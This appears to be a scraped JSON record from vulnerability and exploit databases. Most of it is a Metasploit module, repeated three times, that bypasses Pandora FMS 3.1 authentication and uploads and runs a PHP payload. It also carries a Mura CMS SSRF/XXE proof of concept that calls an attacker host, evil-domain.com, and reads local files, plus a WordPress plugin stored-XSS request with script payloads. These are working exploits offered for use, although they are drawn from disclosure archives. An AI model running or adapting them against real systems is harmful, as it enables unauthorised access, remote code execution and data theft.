<rcnunez[at]upd.edu.ph>', # Metasploit module \n'Elizabeth Loyola <ecloyola[at]upd.edu.ph>', # Metasploit module \n'Fr330wn4g3 <Fr330wn4g3[at]gmail.com>', # Metasploit module \n'_flood <freshbones[at]gmail.com>', # Metasploit module \n'mubix <mubix[at]room362.com>', # Auth bypass and file upload \n'egypt <egypt[at]metasploit.com>', # Auth bypass and file upload \n], \n'References' => \n[ \n['CVE', '2010-4279'], \n['OSVDB', '69549'], \n['BID', '45112'] \n], \n'Platform' => 'php', \n'Arch' => ARCH_PHP, \n'Targets' => \n[ \n['Automatic Targeting', { 'auto' => true }] \n], \n'Privileged' => false, \n'DisclosureDate' => \"Nov 30 2010\", \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptString.new('TARGETURI', [true, 'The path to the web application', '/pandora_console/']), \n], self.class) \nend \n \ndef check \n \nbase = target_uri.path \n \n# retrieve software version from login page \nbegin \nres = send_request_cgi({ \n'method' => 'GET', \n'uri' => normalize_uri(base, 'index.php') \n}) \nif res and res.code == 200 \n#Tested on v3.1 Build PC100609 and PC100608 \nif res.body.include?(\"v3.1 Build PC10060\") \nreturn Exploit::CheckCode::Appears \nelsif res.body.include?(\"Pandora\") \nreturn Exploit::CheckCode::Detected \nend \nend \nreturn Exploit::CheckCode::Safe \nrescue ::Rex::ConnectionError \nprint_error(\"#{peer} - Connection failed\") \nend \nreturn Exploit::CheckCode::Unknown \n \nend \n \n# upload a payload using the pandora built-in file upload \ndef upload(base, file, cookies) \ndata = Rex::MIME::Message.new \ndata.add_part(file, 'application/octet-stream', nil, \"form-data; name=\\\"file\\\"; filename=\\\"#{@fname}\\\"\") \ndata.add_part(\"Go\", nil, nil, 'form-data; name=\"go\"') \ndata.add_part(\"images\", nil, nil, 'form-data; name=\"directory\"') \ndata.add_part(\"1\", nil, nil, 'form-data; name=\"upload_file\"') \ndata_post = data.to_s \ndata_post = data_post.gsub(/^\\r\\n\\-\\-\\_Part\\_/, '--_Part_') \n \nres = send_request_cgi({ \n'method' => 'POST', \n'uri' => normalize_uri(base, 'index.php'), \n'cookie' => cookies, \n'ctype' => \"multipart/form-data; boundary=#{data.bound}\", \n'vars_get' => { \n'sec' => 'gsetup', \n'sec2' => 'godmode/setup/file_manager', \n}, \n'data' => data_post \n}) \n \nregister_files_for_cleanup(@fname) \nreturn res \nend \n \ndef exploit \n \nbase = target_uri.path \n@fname = \"#{rand_text_numeric(7)}.php\" \ncookies = \"\" \n \n# bypass authentication and get session cookie \nres = send_request_cgi({ \n'method' => 'GET', \n'uri' => normalize_uri(base, 'index.php'), \n'vars_get' => { \n'loginhash_data' => '21232f297a57a5a743894a0e4a801fc3', \n'loginhash_user' => 'admin', \n'loginhash' => '1', \n}, \n}) \n \n# fix if logic \nif res and res.code == 200 \nif res.body.include?(\"Logout\") \ncookies = res.get_cookies \nprint_status(\"Login Bypass Successful\") \nprint_status(\"cookie monster = \" + cookies) \nelse \nfail_with(Exploit::Failure::NotVulnerable, \"Login Bypass Failed\") \nend \nend \n \n# upload PHP payload to images/[fname] \nprint_status(\"#{peer} - Uploading PHP payload (#{payload.encoded.length} bytes)\") \nphp = %Q|<?php #{payload.encoded} ?>| \nbegin \nres = upload(base, php, cookies) \nrescue ::Rex::ConnectionError \nfail_with(Exploit::Failure::Unreachable, \"#{peer} - Connection failed\") \nend \n \nif res and res.code == 200 \nprint_good(\"#{peer} - File uploaded successfully\") \nelse \nfail_with(Exploit::Failure::UnexpectedReply, \"#{peer} - Uploading PHP payload failed\") \nend \n \n# retrieve and execute PHP payload \nprint_status(\"#{peer} - Executing payload (images/#{@fname})\") \nbegin \nres = send_request_cgi({ \n'method' => 'GET', \n'uri' => normalize_uri(base, 'images', \"#{@fname}\") \n}, 1) \nrescue ::Rex::ConnectionError \nfail_with(Exploit::Failure::Unreachable, \"#{peer} - Connection failed\") \nend \n \nend \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/129830/pandora_upload_exec.rb.txt"}], "zdt": [{"lastseen": "2018-02-21T01:34:02", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category web applications", "modified": "2017-10-25T00:00:00", "published": "2017-10-25T00:00:00", "href": "https://0day.today/exploit/description/28866", "id": "1337DAY-ID-28866", "type": "zdt", "title": "Mura CMS < 6.2 - Server-Side Request Forgery / XML External Entity Injection Vulnerabilities", "sourceData": "# Exploit Title: Mura CMS before 6.2 SSRF + XXE\r\n# Date: 30-10-2017\r\n# Exploit Author: Anthony Cole\r\n# Vendor Homepage: http://www.getmura.com/\r\n# Version: before 6.2\r\n# Contact: http://twitter.com/acole76\r\n# Website: http://twitter.com/acole76\r\n# Tested on: Windows 2008 w/ Coldfusion 8\r\n# CVE: CVE-2017-15639\r\n# Category: webapps\r\n \r\n1. Description\r\n \r\nAny user can cause Mura CMS before version 6.2 to make a http request. As an added bonus, the response from that HTTP GET request is passed directly to XmlParse(). It is possible to read a file from the file system using an XXE attack.\r\n \r\n \r\n2. Proof of Concept\r\n \r\nvulnerable file is on github, line 50:\r\nhttps://github.com/blueriver/MuraCMS/blob/c8753ce80373eca302c6d9d8a02ff63a1d308991/tasks/feed/readRSS.cfm\r\n \r\nhttp://www.target.tld/tasks/feed/readRSS.cfm?siteid=SITENAMEHERE&rssurl=http://evil-domain.com/file.xml&MAXRSSITEMS=500\r\n \r\nExplanation of params\r\n siteid - The siteid can be obtained by viewing the html source code of the target home page and searching \"siteid\".\r\n rssurl - This is the URL you want Mura CMS to call out to.\r\n \r\nTo perform a XXE attack, you will need to stand up a web server: python -m SimpleHTTPServer 80\r\n \r\nThen create a file:\r\n \r\n<?xml version=\"1.0\" ?>\r\n<!DOCTYPE rss [\r\n <!ENTITY send SYSTEM \"file:///c:\\Windows\\System32\\drivers\\etc\\hosts\">\r\n]>\r\n \r\n<rss version=\"2.0\">\r\n<channel>\r\n <title>title</title>\r\n <link>link</link>\r\n <description>description</description>\r\n <generator>http://www.getmura.com</generator>\r\n <pubDate>Thu, 28 Sep 2018 11:55:19 -0700</pubDate>\r\n <language>en-us</language>\r\n <item>\r\n <title>Item title</title>\r\n <link>http://host/</link>\r\n <guid isPermaLink=\"false\">00000000-0000-0000-0000000000000000</guid>\r\n <pubDate>Thu, 21 Sep 2018 00:00:01 -0700</pubDate>\r\n <description>&send;</description>\r\n </item>\r\n</channel>\r\n</rss>\r\n \r\n3. Solution:\r\n \r\ndelete readRSS.cfm from the server.\n\n# 0day.today [2018-02-20] #", "sourceHref": "https://0day.today/exploit/28866", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-03-01T23:44:02", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2016-08-01T00:00:00", "published": "2016-08-01T00:00:00", "id": "1337DAY-ID-25206", "href": "https://0day.today/exploit/description/25206", "type": "zdt", "title": "WordPress WP Live Chat Support 6.2.03 Plugin - Persistent Cross-Site Scripting", "sourceData": "Stored Cross-Site Scripting vulnerability in WP Live Chat Support WordPress Plugin\r\n \r\nAbstract\r\n \r\nA stored Cross-Site Scripting vulnerability was found in the WP Live Chat Support WordPress Plugin. This issue can be exploited by an unauthenticated user. It allows an attacker to perform a wide variety of actions, such as stealing users' session tokens, or performing arbitrary actions on their behalf.\r\n \r\nContact\r\n \r\nFor feedback or questions about this advisory mail us at sumofpwn at securify.nl\r\n \r\nThe Summer of Pwnage\r\n \r\nThis issue has been found during the Summer of Pwnage hacker event, running from July 1-29. A community summer event in which a large group of security bughunters (worldwide) collaborate in a month of security research on Open Source Software (WordPress this time). For fun. The event is hosted by Securify in Amsterdam.\r\n \r\nOVE ID\r\nOVE-20160724-0010\r\n \r\nTested versions\r\n \r\nThis issue was successfully tested on WP Live Chat Support WordPress Plugin version 6.2.03.\r\n \r\nFix\r\n \r\nThis issue is resolved in WP Live Chat Support version 6.2.04.\r\n \r\nIntroduction\r\n \r\nWP Live Chat Support allows chatting with visitors of a WordPress site. A persistent Cross-Site Scripting vulnerability has been discovered in the WP Live Chat Support allowing an attacker to execute actions on behalf of a logged on WordPress user. A stored Cross-Site Scripting vulnerability was found in the WP Live Chat Support WordPress Plugin. This issue can be exploited by an unauthenticated user. It allows an attacker to perform a wide variety of actions, such as stealing users' session tokens, or performing arbitrary actions on their behalf.\r\n \r\nDetails\r\n \r\nThe vulnerability exists in the file wp-live-chat-support/functions.php (line 1233), which is called in the file wp-live-chat-support/wp-live-chat-support.php (line 602):\r\n \r\nwp-live-chat-support/wp-live-chat-support.php:\r\n \r\n600 if ($_POST['action'] == \"wplc_user_send_offline_message\") {\r\n601 if(function_exists('wplc_send_offline_msg')){ wplc_send_offline_msg($_POST['name'], $_POST['email'], $_POST['msg'], $_POST['cid']); }\r\n602 if(function_exists('wplc_store_offline_message')){ wplc_store_offline_message($_POST['name'], $_POST['email'], $_POST['msg']); }\r\n603 do_action(\"wplc_hook_offline_message\",array(\r\n604 \"cid\"=>$_POST['cid'],\r\n605 \"name\"=>$_POST['name'],\r\n606 \"email\"=>$_POST['email'],\r\n607 \"url\"=>get_site_url(),\r\n608 \"msg\"=>$_POST['msg']\r\n609 )\r\n610 );\r\n611 }\r\n \r\nwp-live-chat-support/functions.php:\r\n \r\n1206 function wplc_store_offline_message($name, $email, $message){\r\n1207 global $wpdb;\r\n1208 global $wplc_tblname_offline_msgs;\r\n1209 \r\n1210 $wplc_settings = get_option('WPLC_SETTINGS');\r\n1211 \r\n1212 if(isset($wplc_settings['wplc_record_ip_address']) && $wplc_settings['wplc_record_ip_address'] == 1){\r\n1213 if(isset($_SERVER['HTTP_X_FORWARDED_FOR']) && $_SERVER['HTTP_X_FORWARDED_FOR'] != '') {\r\n1214 $ip_address = $_SERVER['HTTP_X_FORWARDED_FOR'];\r\n1215 } else {\r\n1216 $ip_address = $_SERVER['REMOTE_ADDR'];\r\n1217 }\r\n1218 $offline_ip_address = $ip_address;\r\n1219 } else {\r\n1220 $offline_ip_address = \"\";\r\n1221 }\r\n1222 \r\n1223 \r\n1224 $ins_array = array(\r\n1225 'timestamp' => current_time('mysql'),\r\n1226 'name' => $name,\r\n1227 'email' => $email,\r\n1228 'message' => $message,\r\n1229 'ip' => $offline_ip_address,\r\n1230 'user_agent' => $_SERVER['HTTP_USER_AGENT']\r\n1231 );\r\n1232 \r\n1233 $rows_affected = $wpdb->insert( $wplc_tblname_offline_msgs, $ins_array );\r\n1234 return;\r\n1235 }\r\n \r\nThe vulnerability can be exploited using a specially crafted POST request. The victim needs view the WP Live Chat Offline Messages page to trigger the Cross-Site Scripting payload. It should be noted taht the offline message functionality is available even if there is a logged on chat user present.\r\n \r\nProof of concept\r\n \r\nPOST /wp-admin/admin-ajax.php HTTP/1.1\r\nHost: <target>\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nContent-Length: 361\r\nConnection: close\r\n \r\naction=wplc_user_send_offline_message&security=8d1fc19e30&cid=1&name=<script>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 88, 83, 83, 32, 105, 110, 32, 110, 97, 109, 101, 33, 34, 41, 59));</script>&email=Mail&msg=<script>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 88, 83, 83, 32, 105, 110, 32, 109, 115, 103, 33, 34, 41, 59));</script>\n\n# 0day.today [2018-03-01] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/25206"}, {"lastseen": "2018-02-06T09:12:27", "bulletinFamily": "exploit", "description": "This Metasploit module exploits an authentication bypass vulnerability in Pandora version 3.1 as disclosed by Juan Galiana Lara. It also integrates with the built-in pandora upload which allows a user to upload arbitrary files to the '/images/' directory. This Metasploit module was created as an exercise in the Metasploit Mastery Class at Blackhat that was facilitated by egypt and mubix.", "modified": "2015-01-07T00:00:00", "published": "2015-01-07T00:00:00", "id": "1337DAY-ID-23084", "href": "https://0day.today/exploit/description/23084", "type": "zdt", "title": "Pandora 3.1 Auth Bypass / Arbitrary File Upload Vulnerabilities", "sourceData": "##\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => \"Pandora v3.1 Auth Bypass and Arbitrary File Upload Vulnerability\",\r\n 'Description' => %q{\r\n This module exploits an authentication bypass vulnerability in Pandora v3.1 as\r\n disclosed by Juan Galiana Lara. It also integrates with the built-in pandora\r\n upload which allows a user to upload arbitrary files to the '/images/' directory.\r\n\r\n This module was created as an exercise in the Metasploit Mastery Class at Blackhat\r\n that was facilitated by egypt and mubix.\r\n\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Juan Galiana Lara', # Vulnerability discovery\r\n 'Raymond Nunez <rcnunez[at]upd.edu.ph>', # Metasploit module\r\n 'Elizabeth Loyola <ecloyola[at]upd.edu.ph>', # Metasploit module\r\n 'Fr330wn4g3 <Fr330wn4g3[at]gmail.com>', # Metasploit module\r\n '_flood <freshbones[at]gmail.com>', # Metasploit module\r\n 'mubix <mubix[at]room362.com>', # Auth bypass and file upload\r\n 'egypt <egypt[at]metasploit.com>', # Auth bypass and file upload\r\n ],\r\n 'References' =>\r\n [\r\n ['CVE', '2010-4279'],\r\n ['OSVDB', '69549'],\r\n ['BID', '45112']\r\n ],\r\n 'Platform' => 'php',\r\n 'Arch' => ARCH_PHP,\r\n 'Targets' =>\r\n [\r\n ['Automatic Targeting', { 'auto' => true }]\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => \"Nov 30 2010\",\r\n 'DefaultTarget' => 0))\r\n\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, 'The path to the web application', '/pandora_console/']),\r\n ], self.class)\r\n end\r\n\r\n def check\r\n\r\n base = target_uri.path\r\n\r\n # retrieve software version from login page\r\n begin\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(base, 'index.php')\r\n })\r\n if res and res.code == 200\r\n #Tested on v3.1 Build PC100609 and PC100608\r\n if res.body.include?(\"v3.1 Build PC10060\")\r\n return Exploit::CheckCode::Appears\r\n elsif res.body.include?(\"Pandora\")\r\n return Exploit::CheckCode::Detected\r\n end\r\n end\r\n return Exploit::CheckCode::Safe\r\n rescue ::Rex::ConnectionError\r\n print_error(\"#{peer} - Connection failed\")\r\n end\r\n return Exploit::CheckCode::Unknown\r\n\r\n end\r\n\r\n # upload a payload using the pandora built-in file upload\r\n def upload(base, file, cookies)\r\n data = Rex::MIME::Message.new\r\n data.add_part(file, 'application/octet-stream', nil, \"form-data; name=\\\"file\\\"; filename=\\\"#{@fname}\\\"\")\r\n data.add_part(\"Go\", nil, nil, 'form-data; name=\"go\"')\r\n data.add_part(\"images\", nil, nil, 'form-data; name=\"directory\"')\r\n data.add_part(\"1\", nil, nil, 'form-data; name=\"upload_file\"')\r\n data_post = data.to_s\r\n data_post = data_post.gsub(/^\\r\\n\\-\\-\\_Part\\_/, '--_Part_')\r\n\r\n res = send_request_cgi({\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(base, 'index.php'),\r\n 'cookie' => cookies,\r\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\r\n 'vars_get' => {\r\n 'sec' => 'gsetup',\r\n 'sec2' => 'godmode/setup/file_manager',\r\n },\r\n 'data' => data_post\r\n })\r\n\r\n register_files_for_cleanup(@fname)\r\n return res\r\n end\r\n\r\n def exploit\r\n\r\n base = target_uri.path\r\n @fname = \"#{rand_text_numeric(7)}.php\"\r\n cookies = \"\"\r\n\r\n # bypass authentication and get session cookie\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(base, 'index.php'),\r\n 'vars_get' => {\r\n 'loginhash_data' => '21232f297a57a5a743894a0e4a801fc3',\r\n 'loginhash_user' => 'admin',\r\n 'loginhash' => '1',\r\n },\r\n })\r\n\r\n # fix if logic\r\n if res and res.code == 200\r\n if res.body.include?(\"Logout\")\r\n cookies = res.get_cookies\r\n print_status(\"Login Bypass Successful\")\r\n print_status(\"cookie monster = \" + cookies)\r\n else\r\n fail_with(Exploit::Failure::NotVulnerable, \"Login Bypass Failed\")\r\n end\r\n end\r\n\r\n # upload PHP payload to images/[fname]\r\n print_status(\"#{peer} - Uploading PHP payload (#{payload.encoded.length} bytes)\")\r\n php = %Q|<?php #{payload.encoded} ?>|\r\n begin\r\n res = upload(base, php, cookies)\r\n rescue ::Rex::ConnectionError\r\n fail_with(Exploit::Failure::Unreachable, \"#{peer} - Connection failed\")\r\n end\r\n\r\n if res and res.code == 200\r\n print_good(\"#{peer} - File uploaded successfully\")\r\n else\r\n fail_with(Exploit::Failure::UnexpectedReply, \"#{peer} - Uploading PHP payload failed\")\r\n end\r\n\r\n # retrieve and execute PHP payload\r\n print_status(\"#{peer} - Executing payload (images/#{@fname})\")\r\n begin\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(base, 'images', \"#{@fname}\")\r\n }, 1)\r\n rescue ::Rex::ConnectionError\r\n fail_with(Exploit::Failure::Unreachable, \"#{peer} - Connection failed\")\r\n end\r\n\r\n end\r\nend\n\n# 0day.today [2018-02-06] #", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/23084"}], "exploitdb": [{"lastseen": "2017-10-25T16:30:50", "bulletinFamily": "exploit", "description": "Mura CMS < 6.2 - Server-Side Request Forgery / XML External Entity Injection. CVE-2017-15639. Webapps exploit for CFM platform", "modified": "2017-10-24T00:00:00", "published": "2017-10-24T00:00:00", "id": "EDB-ID:43045", "href": "https://www.exploit-db.com/exploits/43045/", "type": "exploitdb", "title": "Mura CMS < 6.2 - Server-Side Request Forgery / XML External Entity Injection", "sourceData": "# Exploit Title: Mura CMS before 6.2 SSRF + XXE\r\n# Date: 30-10-2017\r\n# Exploit Author: Anthony Cole\r\n# Vendor Homepage: http://www.getmura.com/\r\n# Version: before 6.2\r\n# Contact: http://twitter.com/acole76\r\n# Website: http://twitter.com/acole76\r\n# Tested on: Windows 2008 w/ Coldfusion 8\r\n# CVE: CVE-2017-15639\r\n# Category: webapps\r\n \r\n1. Description\r\n \r\nAny user can cause Mura CMS before version 6.2 to make a http request. As an added bonus, the response from that HTTP GET request is passed directly to XmlParse(). It is possible to read a file from the file system using an XXE attack.\r\n \r\n \r\n2. Proof of Concept\r\n\r\nvulnerable file is on github, line 50:\r\nhttps://github.com/blueriver/MuraCMS/blob/c8753ce80373eca302c6d9d8a02ff63a1d308991/tasks/feed/readRSS.cfm\r\n \r\nhttp://www.target.tld/tasks/feed/readRSS.cfm?siteid=SITENAMEHERE&rssurl=http://evil-domain.com/file.xml&MAXRSSITEMS=500\r\n\r\nExplanation of params\r\n\tsiteid - The siteid can be obtained by viewing the html source code of the target home page and searching \"siteid\".\r\n\trssurl - This is the URL you want Mura CMS to call out to.\r\n\t\r\nTo perform a XXE attack, you will need to stand up a web server: python -m SimpleHTTPServer 80\r\n\t\r\nThen create a file:\r\n\r\n<?xml version=\"1.0\" ?>\r\n<!DOCTYPE rss [\r\n <!ENTITY send SYSTEM \"file:///c:\\Windows\\System32\\drivers\\etc\\hosts\">\r\n]>\r\n\r\n<rss version=\"2.0\">\r\n<channel>\r\n <title>title</title>\r\n <link>link</link>\r\n <description>description</description>\r\n <generator>http://www.getmura.com</generator>\r\n <pubDate>Thu, 28 Sep 2018 11:55:19 -0700</pubDate>\r\n <language>en-us</language>\r\n <item>\r\n <title>Item title</title>\r\n <link>http://host/</link>\r\n <guid isPermaLink=\"false\">00000000-0000-0000-0000000000000000</guid>\r\n <pubDate>Thu, 21 Sep 2018 00:00:01 -0700</pubDate>\r\n <description>&send;</description>\r\n </item>\r\n</channel>\r\n</rss>\r\n \r\n3. Solution:\r\n\r\ndelete readRSS.cfm from the server.", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/43045/"}, {"lastseen": "2016-02-04T01:53:48", "bulletinFamily": "exploit", "description": "Pandora v3.1 Auth Bypass and Arbitrary File Upload Vulnerability. CVE-2010-4279. Remote exploit for php platform", "modified": "2015-01-08T00:00:00", "published": "2015-01-08T00:00:00", "id": "EDB-ID:35731", "href": "https://www.exploit-db.com/exploits/35731/", "type": "exploitdb", "title": "Pandora 3.1 - Auth Bypass and Arbitrary File Upload Vulnerability", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => \"Pandora v3.1 Auth Bypass and Arbitrary File Upload Vulnerability\",\r\n 'Description' => %q{\r\n This module exploits an authentication bypass vulnerability in Pandora v3.1 as\r\n disclosed by Juan Galiana Lara. It also integrates with the built-in pandora\r\n upload which allows a user to upload arbitrary files to the '/images/' directory.\r\n\r\n This module was created as an exercise in the Metasploit Mastery Class at Blackhat\r\n that was facilitated by egypt and mubix.\r\n\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Juan Galiana Lara', # Vulnerability discovery\r\n 'Raymond Nunez <rcnunez[at]upd.edu.ph>', # Metasploit module\r\n 'Elizabeth Loyola <ecloyola[at]upd.edu.ph>', # Metasploit module\r\n 'Fr330wn4g3 <Fr330wn4g3[at]gmail.com>', # Metasploit module\r\n '_flood <freshbones[at]gmail.com>', # Metasploit module\r\n 'mubix <mubix[at]room362.com>', # Auth bypass and file upload\r\n 'egypt <egypt[at]metasploit.com>', # Auth bypass and file upload\r\n ],\r\n 'References' =>\r\n [\r\n ['CVE', '2010-4279'],\r\n ['OSVDB', '69549'],\r\n ['BID', '45112']\r\n ],\r\n 'Platform' => 'php',\r\n 'Arch' => ARCH_PHP,\r\n 'Targets' =>\r\n [\r\n ['Automatic Targeting', { 'auto' => true }]\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => \"Nov 30 2010\",\r\n 'DefaultTarget' => 0))\r\n\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, 'The path to the web application', '/pandora_console/']),\r\n ], self.class)\r\n end\r\n\r\n def check\r\n\r\n base = target_uri.path\r\n\r\n # retrieve software version from login page\r\n begin\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(base, 'index.php')\r\n })\r\n if res and res.code == 200\r\n #Tested on v3.1 Build PC100609 and PC100608\r\n if res.body.include?(\"v3.1 Build PC10060\")\r\n return Exploit::CheckCode::Appears\r\n elsif res.body.include?(\"Pandora\")\r\n return Exploit::CheckCode::Detected\r\n end\r\n end\r\n return Exploit::CheckCode::Safe\r\n rescue ::Rex::ConnectionError\r\n vprint_error(\"#{peer} - Connection failed\")\r\n end\r\n return Exploit::CheckCode::Unknown\r\n\r\n end\r\n\r\n # upload a payload using the pandora built-in file upload\r\n def upload(base, file, cookies)\r\n data = Rex::MIME::Message.new\r\n data.add_part(file, 'application/octet-stream', nil, \"form-data; name=\\\"file\\\"; filename=\\\"#{@fname}\\\"\")\r\n data.add_part(\"Go\", nil, nil, 'form-data; name=\"go\"')\r\n data.add_part(\"images\", nil, nil, 'form-data; name=\"directory\"')\r\n data.add_part(\"1\", nil, nil, 'form-data; name=\"upload_file\"')\r\n data_post = data.to_s\r\n data_post = data_post.gsub(/^\\r\\n\\-\\-\\_Part\\_/, '--_Part_')\r\n\r\n res = send_request_cgi({\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(base, 'index.php'),\r\n 'cookie' => cookies,\r\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\r\n 'vars_get' => {\r\n 'sec' => 'gsetup',\r\n 'sec2' => 'godmode/setup/file_manager',\r\n },\r\n 'data' => data_post\r\n })\r\n\r\n register_files_for_cleanup(@fname)\r\n return res\r\n end\r\n\r\n def exploit\r\n\r\n base = target_uri.path\r\n @fname = \"#{rand_text_numeric(7)}.php\"\r\n cookies = \"\"\r\n\r\n # bypass authentication and get session cookie\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(base, 'index.php'),\r\n 'vars_get' => {\r\n 'loginhash_data' => '21232f297a57a5a743894a0e4a801fc3',\r\n 'loginhash_user' => 'admin',\r\n 'loginhash' => '1',\r\n },\r\n })\r\n\r\n # fix if logic\r\n if res and res.code == 200\r\n if res.body.include?(\"Logout\")\r\n cookies = res.get_cookies\r\n print_status(\"Login Bypass Successful\")\r\n print_status(\"cookie monster = \" + cookies)\r\n else\r\n fail_with(Exploit::Failure::NotVulnerable, \"Login Bypass Failed\")\r\n end\r\n end\r\n\r\n # upload PHP payload to images/[fname]\r\n print_status(\"#{peer} - Uploading PHP payload (#{payload.encoded.length} bytes)\")\r\n php = %Q|<?php #{payload.encoded} ?>|\r\n begin\r\n res = upload(base, php, cookies)\r\n rescue ::Rex::ConnectionError\r\n fail_with(Exploit::Failure::Unreachable, \"#{peer} - Connection failed\")\r\n end\r\n\r\n if res and res.code == 200\r\n print_good(\"#{peer} - File uploaded successfully\")\r\n else\r\n fail_with(Exploit::Failure::UnexpectedReply, \"#{peer} - Uploading PHP payload failed\")\r\n end\r\n\r\n # retrieve and execute PHP payload\r\n print_status(\"#{peer} - Executing payload (images/#{@fname})\")\r\n begin\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(base, 'images', \"#{@fname}\")\r\n }, 1)\r\n rescue ::Rex::ConnectionError\r\n fail_with(Exploit::Failure::Unreachable, \"#{peer} - Connection failed\")\r\n end\r\n\r\n end\r\nend", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/35731/"}], "cve": [{"lastseen": "2019-05-29T18:16:54", "bulletinFamily": "NVD", "description": "tasks/feed/readRSS.cfm in Mura CMS before 6.2 allows attackers to bypass intended access restrictions by leveraging the \"draggable feeds\" feature.", "modified": "2017-11-08T13:50:00", "id": "CVE-2017-15639", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-15639", "published": "2017-10-19T19:29:00", "title": "CVE-2017-15639", "type": "cve", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}], "seebug": [{"lastseen": "2017-11-19T15:59:55", "bulletinFamily": "exploit", "description": "No description provided by source.", "modified": "2014-07-01T00:00:00", "published": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-70305", "id": "SSV:70305", "title": "Pandora FMS <= 3.1 Authentication Bypass", "type": "seebug", "sourceData": "\n [+] Introduction\r\n\r\nPandora FMS (for Pandora Flexible Monitoring System) is a software\r\nsolution for monitoring computer networks. It allows monitoring in a\r\nvisual way the status and performance of several parameters from\r\ndifferent operating systems, servers, applications and hardware systems\r\nsuch as firewalls, proxies, databases, web servers or routers.\r\n\r\nIt can be deployed in almost any operating system. It features remote\r\nmonitoring (WMI, SNMP, TCP. UDP, ICMP, HTTP...) and it can also use\r\nagents. An agent is available for each platform. It can also monitor\r\nhardware systems with a TCP/IP stack, such as load balancers, routers,\r\nnetwork switches, printers or firewalls.\r\n\r\nThis software has several servers that process and get information from\r\ndifferent sources, using WMI for gathering remote Windows information, a\r\npredictive server, a plug-in server which makes complex user-defined\r\nnetwork tests, an advanced export server to replicate data between\r\ndifferent sites of Pandora FMS, a network discovery server, and an SNMP\r\nTrap console.\r\n\r\nReleased under the terms of the GNU General Public License, Pandora FMS\r\nis free software.\r\n\r\n\r\n[+] Description and Proof of Concept\r\n\r\n\r\n1) Authentication bypass - CVE-2010-4279 - CVSS: 10/10\r\n\r\nAn attacker could access to any account user, including admin, using the\r\n"hash login" authentication process. This kind of authentication method\r\nworks providing a username and a hash. The issue could be exploited\r\nremotely providing a username and the md5 of it when\r\n$config['loginhash_pwd'] is empty, that in fact is the default\r\nconfiguration.\r\n\r\nSnippet of vulnerable code in index.php:\r\n\r\n136 // Hash login process\r\n137 if (! isset ($config['id_user']) && isset ($_GET["loginhash"])) {\r\n138 $loginhash_data = get_parameter("loginhash_data", "");\r\n139 $loginhash_user = get_parameter("loginhash_user", "");\r\n140\r\n141 if ($loginhash_data ==\r\nmd5($loginhash_user.$config["loginhash_pwd"])) {\r\n142 logon_db ($loginhash_user, $_SERVER['REMOTE_ADDR']);\r\n143 $_SESSION['id_usuario'] = $loginhash_user;\r\n144 $config["id_user"] = $loginhash_user;\r\n\r\n\r\n\r\nProof of concept:\r\n\r\nhttp://servername/pandora_console/index.php?loginhash_data=21232f297a57a5a743894a0e4a801fc3&loginhash_user=admin&loginhash=1\r\n\r\nGot it! admin! :)\r\n\r\nBy default, any installation of this software allows unauthenticated\r\nattackers to perform an authentication bypass and a privilege escalation\r\nto admin.\r\n\r\n\r\n1.1) Additionally, a manual modification in order to use the hash_hmac\r\nfunction instead of the weak statement md5 ( $string . $KEY) is\r\nencouraged for security 